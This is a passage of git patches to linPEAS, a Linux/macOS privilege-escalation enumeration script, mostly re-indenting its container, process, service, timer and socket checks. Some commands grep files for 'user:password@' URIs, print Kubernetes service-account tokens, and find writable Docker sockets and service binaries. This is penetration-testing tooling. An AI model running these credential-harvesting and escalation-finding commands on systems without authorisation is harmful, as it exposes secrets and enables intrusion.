+fi + +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then + ##-- IF) Find URIs with user:password@hoststrings + print_2title "Finding URIs with user:password@host inside key folders" + timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + echo "" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi From 4d67bbc32d430d7a207be55d07c8435aff953541 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sat, 18 Dec 2021 16:58:56 -0500 Subject: [PATCH 2/5] fix --- .../linpeas_parts/available_software.sh | 13 +- linPEAS/builder/linpeas_parts/container.sh | 137 ++++----- .../procs_crons_timers_srvcs_sockets.sh | 259 +++++++++--------- linPEAS/builder/src/linpeasBaseBuilder.py | 2 +- 4 files changed, 207 insertions(+), 204 deletions(-) diff --git a/linPEAS/builder/linpeas_parts/available_software.sh b/linPEAS/builder/linpeas_parts/available_software.sh index 8da4d10..5c9ecd4 100644 --- a/linPEAS/builder/linpeas_parts/available_software.sh +++ b/linPEAS/builder/linpeas_parts/available_software.sh @@ -13,15 +13,15 @@ print_2title "Installed Compiler" echo "" if [ "$(command -v pkg 2>/dev/null)" ]; then -print_2title "Vulnerable Packages" -pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" -echo "" + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" fi if [ "$(command -v brew 2>/dev/null)" ]; then -print_2title "Brew Installed Packages" -brew list -echo "" + print_2title "Brew Installed Packages" + brew list + echo "" fi if [ "$MACPEAS" ]; then @@ -37,3 +37,4 @@ system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi done +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/container.sh b/linPEAS/builder/linpeas_parts/container.sh index d249e3a..c1af4cf 100644 --- a/linPEAS/builder/linpeas_parts/container.sh +++ b/linPEAS/builder/linpeas_parts/container.sh @@ -16,80 +16,81 @@ podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then -echo_no + echo_no else -containerCounts="" -if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi -if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi -if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi -if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi -echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," -# List any running containers -if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi -if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi -if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi -if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi + containerCounts="" + if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi + if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi + if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + + # List any running containers + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi #If docker if echo "$containerType" | grep -qi "docker"; then -print_2title "Docker Container details" -inDockerGroup -print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," -print_list "Looking and enumerating Docker Sockets\n"$NC -enumerateDockerSockets -print_list "Docker version .................$NC$dockerVersion" -checkDockerVersionExploits -print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," -fi -if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker -fi -fi - -if [ "$inContainer" ]; then -echo "" -print_2title "Container & breakout enumeration" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" -print_list "Container ID ...................$NC $(cat /etc/hostname)" -if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" -fi -if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" -fi - -checkContainerExploits -print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -echo "" - -print_2title "Container Capabilities" -capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" -echo "" - -print_2title "Privilege Mode" -if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + print_2title "Docker Container details" + inDockerGroup + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC + enumerateDockerSockets + print_list "Docker version .................$NC$dockerVersion" + checkDockerVersionExploits + print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + fi + if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker fi -else - echo_not_found fi -echo "" -print_2title "Interesting Files Mounted" -(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" -echo "" +if [ "$inContainer" ]; then + echo "" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC $(cat /etc/hostname)" + if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" + fi + if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + fi -print_2title "Possible Entrypoints" -ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq -echo "" -fi + checkContainerExploits + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + echo "" + + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + echo "" + + print_2title "Privilege Mode" + if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi + else + echo_not_found + fi + echo "" + + print_2title "Interesting Files Mounted" + (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" + echo "" + + print_2title "Possible Entrypoints" + ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh index fbb435e..0a9a4e3 100644 --- a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh +++ b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh @@ -1,3 +1,4 @@ + #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### @@ -5,46 +6,46 @@ #-- PCS) Cleaned proccesses print_2title "Cleaned processes" if [ "$NOUSEPS" ]; then -printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" if [ "$NOUSEPS" ]; then -print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," -pslist=$(print_ps) + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) else -(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi fi - fi -done -pslist=$(ps auxwww) -echo "" + done + pslist=$(ps auxwww) + echo "" -#-- PCS) Binary processes permissions -print_2title "Binary processes permissions" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" -binW="IniTialiZZinnggg" -ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then - binW="$binW|$bpath" + binW="$binW|$bpath" fi -done -ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," fi echo "" #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then -print_2title "Files opened by processes belonging to other users" -print_info "This is usually empty because of the lack of privileges to read other user processes information" -lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -echo "" + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" fi #-- PCS) Processes with credentials inside memory @@ -60,11 +61,11 @@ echo "" #-- PCS) Different processes 1 min if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then -print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" -temp_file=$(mktemp) -if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi -echo "" + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + echo "" fi #-- PCS) Cron @@ -82,42 +83,42 @@ atq 2>/dev/null echo "" if [ "$MACPEAS" ]; then -print_2title "Third party LaunchAgents & LaunchDemons" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" -ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null -echo "" + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" -print_2title "Writable System LaunchAgents & LaunchDemons" -find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do program="" program=$(defaults read "$f" Program 2>/dev/null) if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi -done -echo "" + done + echo "" -print_2title "StartupItems" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" -ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null -echo "" + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" -print_2title "Login Items" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" -osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null -echo "" + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" -print_2title "SPStartupItemDataType" -system_profiler SPStartupItemDataType -echo "" + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" -print_2title "Emond scripts" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" -ls -l /private/var/db/emondClients -echo "" + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" fi #-- PCS) Services @@ -138,26 +139,26 @@ echo "" print_2title "Analyzing .service files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do -if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if [ ! -O "$s" ]; then #Remove services that belongs to the current user if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then + if [ -w "$sp" ]; then echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi + fi done relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else + else echo "$s is executing some relative path" + fi fi - fi -fi + fi done if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" @@ -172,116 +173,116 @@ echo "" print_2title "Analyzing .timer files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do -if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" -fi -timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) -printf "%s\n" "$timerbinpaths" | while read tb; do + fi + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) + printf "%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" fi -done -#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" -#for rp in "$relpath"; do -# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" -#done + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done done echo "" #-- PSC) .socket files #TODO: .socket files in MACOS are folders if ! [ "$IAMROOT" ]; then -print_2title "Analyzing .socket files" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" -printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then + if [ -w "$sb" ]; then echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi + fi done socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then + if [ -w "$sl" ]; then echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi + fi done -done -if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + done + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" -fi -if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + fi + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" -fi -echo "" + fi + echo "" -print_2title "Unix Sockets Listening" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" -# Search sockets using netstat and ss -unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) -if ! [ "$unix_scks_list" ];then + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") -fi -if ! [ "$unix_scks_list" ];then + fi + if ! [ "$unix_scks_list" ];then unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) -fi + fi + + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) -# But also search socket files -unix_scks_list2=$(find / -type s 2>/dev/null) - -# Detele repeated dockets and check permissions -(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + # Detele repeated dockets and check permissions + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do perms="" if [ -r "$l" ]; then - perms="Read " + perms="Read " fi if [ -w "$l" ];then - perms="${perms}Write" + perms="${perms}Write" fi if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then owner=$(ls -l "$s" | cut -d ' ' -f 3) echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "$socketcurl" | head -n 30 + fi fi - fi -done -echo "" + done + echo "" fi #-- PSC) Writable and 